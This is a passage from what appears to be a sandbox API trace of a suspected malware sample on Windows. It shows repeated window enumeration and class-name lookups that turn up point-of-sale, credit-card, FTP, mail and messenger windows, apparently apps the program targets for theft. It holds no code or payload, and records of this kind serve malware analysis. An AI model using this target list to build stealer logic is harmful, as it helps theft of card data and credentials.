lParam=0x550000) [0149.066] Sleep (dwMilliseconds=0x64) [0149.177] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.178] Sleep (dwMilliseconds=0x64) [0149.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.235] Sleep (dwMilliseconds=0x64) [0149.269] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.270] Sleep (dwMilliseconds=0x64) [0149.277] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.278] Sleep (dwMilliseconds=0x64) [0149.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.297] Sleep (dwMilliseconds=0x64) [0149.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.312] Sleep (dwMilliseconds=0x64) [0149.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.328] Sleep (dwMilliseconds=0x64) [0149.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.345] Sleep (dwMilliseconds=0x64) [0149.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.356] Sleep (dwMilliseconds=0x64) [0149.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.376] Sleep (dwMilliseconds=0x64) [0149.422] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.422] Sleep (dwMilliseconds=0x64) [0149.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.468] Sleep (dwMilliseconds=0x64) [0149.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.481] Sleep (dwMilliseconds=0x64) [0149.499] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.500] Sleep (dwMilliseconds=0x64) [0149.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.513] Sleep (dwMilliseconds=0x64) [0149.535] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.535] Sleep (dwMilliseconds=0x64) [0149.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.544] Sleep (dwMilliseconds=0x64) [0149.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.560] Sleep (dwMilliseconds=0x64) [0149.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.641] Sleep (dwMilliseconds=0x64) [0149.716] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.720] Sleep (dwMilliseconds=0x64) [0149.738] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) returned 1 [0149.738] GetClassNameA (in: hWnd=0x100ec, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0149.738] GetClassNameA (in: hWnd=0x1014a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0149.739] GetClassNameA (in: hWnd=0x1010e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0149.739] GetClassNameA (in: hWnd=0x1011c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x10120, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x10122, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x1011e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x1011a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x10118, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0149.739] GetClassNameA (in: hWnd=0x10116, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x10114, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.739] GetClassNameA (in: hWnd=0x10178, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.739] GetClassNameA (in: hWnd=0x1016a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.739] GetClassNameA (in: hWnd=0x1015a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.739] GetClassNameA (in: hWnd=0x10112, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.739] GetClassNameA (in: hWnd=0x10102, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0149.743] GetClassNameA (in: hWnd=0x10198, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0149.743] GetClassNameA (in: hWnd=0x10196, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00000000061A2330-1a4b5f2") returned 36 [0149.743] GetClassNameA (in: hWnd=0x1018e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0149.743] GetClassNameA (in: hWnd=0x10188, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0149.743] GetClassNameA (in: hWnd=0x100d8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.743] GetClassNameA (in: hWnd=0x100b2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.743] GetClassNameA (in: hWnd=0x100b6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.744] GetClassNameA (in: hWnd=0x100c2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.744] GetClassNameA (in: hWnd=0x100cc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.744] GetClassNameA (in: hWnd=0x100d0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.748] GetClassNameA (in: hWnd=0x10098, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.748] GetClassNameA (in: hWnd=0x100a6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.748] GetClassNameA (in: hWnd=0x100ca, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.748] GetClassNameA (in: hWnd=0x1008c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0149.748] GetClassNameA (in: hWnd=0x20030, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA00814120") returned 20 [0149.748] GetClassNameA (in: hWnd=0x100e6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.748] GetClassNameA (in: hWnd=0x100da, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0149.748] GetClassNameA (in: hWnd=0x10348, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="localRealityBankwnd") returned 19 [0149.748] GetClassNameA (in: hWnd=0x502f2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0149.748] GetClassNameA (in: hWnd=0x20300, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.748] GetClassNameA (in: hWnd=0x2030c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="VSyncHelper-007A8B38-820ac57") returned 28 [0149.748] GetClassNameA (in: hWnd=0x3032c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0149.748] GetClassNameA (in: hWnd=0x2025a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0149.749] GetClassNameA (in: hWnd=0x20240, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Alternate Owner") returned 15 [0149.749] GetClassNameA (in: hWnd=0x2021c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.749] GetClassNameA (in: hWnd=0x301fa, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.749] GetClassNameA (in: hWnd=0x20336, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0149.749] GetClassNameA (in: hWnd=0x10340, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="likelyFinaloutwnd") returned 17 [0149.749] GetClassNameA (in: hWnd=0x1033a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="utg2_wnd") returned 8 [0149.749] GetClassNameA (in: hWnd=0x40088, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0149.749] GetClassNameA (in: hWnd=0x1034a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="kitchenBoxinsteadwin") returned 20 [0149.749] GetClassNameA (in: hWnd=0x10334, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="spcwin_") returned 7 [0149.749] GetClassNameA (in: hWnd=0x10332, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="spgagentservicewin") returned 18 [0149.749] GetClassNameA (in: hWnd=0x1032a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="omnipos_wnd") returned 11 [0149.749] GetClassNameA (in: hWnd=0x10324, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="isspos") returned 6 [0149.749] GetClassNameA (in: hWnd=0x102dc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="trilliancls") returned 11 [0149.749] GetClassNameA (in: hWnd=0x10322, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="mxslipstream_class") returned 18 [0149.749] GetClassNameA (in: hWnd=0x1031a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="fposwindow") returned 10 [0149.750] GetClassNameA (in: hWnd=0x10312, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="edcsvr_class") returned 12 [0149.750] GetClassNameA (in: hWnd=0x1030e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="creditservice_wnd") returned 17 [0149.750] GetClassNameA (in: hWnd=0x102ce, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="skype") returned 5 [0149.750] GetClassNameA (in: hWnd=0x1030a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="centralcreditcard_cls") returned 21 [0149.750] GetClassNameA (in: hWnd=0x10304, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ccv_server_class") returned 16 [0149.750] GetClassNameA (in: hWnd=0x10302, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="aldeloclass") returned 11 [0149.750] GetClassNameA (in: hWnd=0x102be, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="pidgin_") returned 7 [0149.750] GetClassNameA (in: hWnd=0x102fa, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="afr38") returned 5 [0149.750] GetClassNameA (in: hWnd=0x102f4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0149.750] GetClassNameA (in: hWnd=0x4009c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="accupos_app") returned 11 [0149.750] GetClassNameA (in: hWnd=0x102ae, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="notepad_wnd") returned 11 [0149.750] GetClassNameA (in: hWnd=0x102f0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="winscp_app") returned 10 [0149.750] GetClassNameA (in: hWnd=0x102e6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="whatsapp_app") returned 12 [0149.750] GetClassNameA (in: hWnd=0x102e8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="webdrive_app") returned 12 [0149.750] GetClassNameA (in: hWnd=0x102da, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="smartftp_cls") returned 12 [0149.750] GetClassNameA (in: hWnd=0x102d8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="thunderbird_cls") returned 15 [0149.751] GetClassNameA (in: hWnd=0x102c4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0149.751] GetClassNameA (in: hWnd=0x102c2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="scriptftp_cls") returned 13 [0149.751] GetClassNameA (in: hWnd=0x102b6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="operamail_app") returned 13 [0149.751] GetClassNameA (in: hWnd=0x1027e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="filezilla_window") returned 16 [0149.751] GetClassNameA (in: hWnd=0x102ac, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ncftp_class") returned 11 [0149.751] GetClassNameA (in: hWnd=0x102a0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="leechftpapp") returned 11 [0149.751] GetClassNameA (in: hWnd=0x102a2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="icqwindow") returned 9 [0149.751] GetClassNameA (in: hWnd=0x10278, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="coreftp_") returned 8 [0149.751] GetClassNameA (in: hWnd=0x102a4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="gmailnotifierpro_app") returned 20 [0149.751] GetClassNameA (in: hWnd=0x10296, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="fling") returned 5 [0149.751] GetClassNameA (in: hWnd=0x10294, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="foxmailincmailapp") returned 17 [0149.751] GetClassNameA (in: hWnd=0x10272, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="barca_wnd") returned 9 [0149.751] GetClassNameA (in: hWnd=0x1028a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="flashfxp_window") returned 15 [0149.751] GetClassNameA (in: hWnd=0x10268, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="alftpwnd") returned 8 [0149.751] GetClassNameA (in: hWnd=0x10280, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="far_class") returned 9 [0149.751] GetClassNameA (in: hWnd=0x10276, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="bitkinexwindow") returned 14 [0149.752] GetClassNameA (in: hWnd=0x1026c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="absolutetelnetwindow") returned 20 [0149.752] GetClassNameA (in: hWnd=0x1024c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Minute_Budget_themselves_window") returned 31 [0149.752] GetClassNameA (in: hWnd=0x10260, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="3dftpcls") returned 8 [0149.752] GetClassNameA (in: hWnd=0x10246, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="health_prove_opportunity_") returned 25 [0149.752] GetClassNameA (in: hWnd=0x10244, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="breakapp") returned 8 [0149.752] GetClassNameA (in: hWnd=0x1023a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="goodwnd") returned 7 [0149.752] GetClassNameA (in: hWnd=0x1023c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="itemStudysafecls") returned 16 [0149.752] GetClassNameA (in: hWnd=0x10230, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="structurecausebar") returned 17 [0149.752] GetClassNameA (in: hWnd=0x1021e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Question_app") returned 12 [0149.752] GetClassNameA (in: hWnd=0x10232, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MemoryEverybodynaturecls") returned 24 [0149.752] GetClassNameA (in: hWnd=0x1022a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="PlayHitwin") returned 10 [0149.752] GetClassNameA (in: hWnd=0x10228, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="evening_wnd") returned 11 [0149.752] GetClassNameA (in: hWnd=0x10226, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="meanwin") returned 7 [0149.752] GetClassNameA (in: hWnd=0x10212, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="feel_wnd") returned 8 [0149.752] GetClassNameA (in: hWnd=0x10210, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="reachinvolvewnd") returned 15 [0149.752] GetClassNameA (in: hWnd=0x10214, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="action_Program_citizen_window") returned 29 [0149.753] GetClassNameA (in: hWnd=0x10208, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Myselfclass") returned 11 [0149.753] GetClassNameA (in: hWnd=0x30202, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="student_because_democratic_app") returned 30 [0149.753] GetClassNameA (in: hWnd=0x10206, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Sharewnd") returned 8 [0149.753] GetClassNameA (in: hWnd=0x201f8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0149.753] GetClassNameA (in: hWnd=0x101e4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.753] GetClassNameA (in: hWnd=0x201de, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.753] GetClassNameA (in: hWnd=0x2013e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0149.753] GetClassNameA (in: hWnd=0x101e6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.753] GetClassNameA (in: hWnd=0x2015e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.753] GetClassNameA (in: hWnd=0x20142, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0149.753] GetClassNameA (in: hWnd=0x20140, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0149.753] GetClassNameA (in: hWnd=0x2013c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.753] GetClassNameA (in: hWnd=0x30020, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.753] GetClassNameA (in: hWnd=0x101ca, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA08097080") returned 20 [0149.753] GetClassNameA (in: hWnd=0x101be, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x101b0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0149.754] GetClassNameA (in: hWnd=0x101ac, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x101aa, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0149.754] GetClassNameA (in: hWnd=0x10126, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x1012e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0149.754] GetClassNameA (in: hWnd=0x101a0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x101a2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x1012c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0149.754] GetClassNameA (in: hWnd=0x10124, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0149.754] GetClassNameA (in: hWnd=0x1010a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0149.754] GetClassNameA (in: hWnd=0x10108, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0149.754] GetClassNameA (in: hWnd=0x10100, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0149.754] GetClassNameA (in: hWnd=0x100fc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x100f6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x100f4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.754] GetClassNameA (in: hWnd=0x200e0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.755] GetClassNameA (in: hWnd=0x100ce, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0149.755] GetClassNameA (in: hWnd=0x2001e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0149.755] GetClassNameA (in: hWnd=0x20034, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0149.755] GetClassNameA (in: hWnd=0x20036, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.755] GetClassNameA (in: hWnd=0x2004c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0149.755] GetClassNameA (in: hWnd=0x101d4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.755] GetClassNameA (in: hWnd=0x200f2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.755] GetClassNameA (in: hWnd=0x200ee, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.755] GetClassNameA (in: hWnd=0x100ba, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0149.755] GetClassNameA (in: hWnd=0x2007c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0149.755] GetClassNameA (in: hWnd=0x20072, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0149.755] GetClassNameA (in: hWnd=0x4006e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0149.755] GetClassNameA (in: hWnd=0x10024, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0149.755] GetClassNameA (in: hWnd=0x10180, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0149.755] GetClassNameA (in: hWnd=0x30242, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0149.755] GetClassNameA (in: hWnd=0x100de, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0149.756] GetClassNameA (in: hWnd=0x1014c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x1017a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x1016c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x1015c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x10190, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x100dc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0149.756] GetClassNameA (in: hWnd=0x1008e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x1037c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x80326, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x20238, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x2020e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x20330, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x1037a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x10378, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.756] GetClassNameA (in: hWnd=0x10376, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10374, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10370, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1036e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1036c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1036a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10364, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10362, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10360, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1035e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1035c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1035a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x20204, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10358, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10354, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x10352, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.757] GetClassNameA (in: hWnd=0x1034e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x1034c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10346, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10344, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10342, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10338, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x1032e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10328, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x1031e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10318, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10310, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x10308, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x102fe, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x102f8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x102ec, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.758] GetClassNameA (in: hWnd=0x102e2, 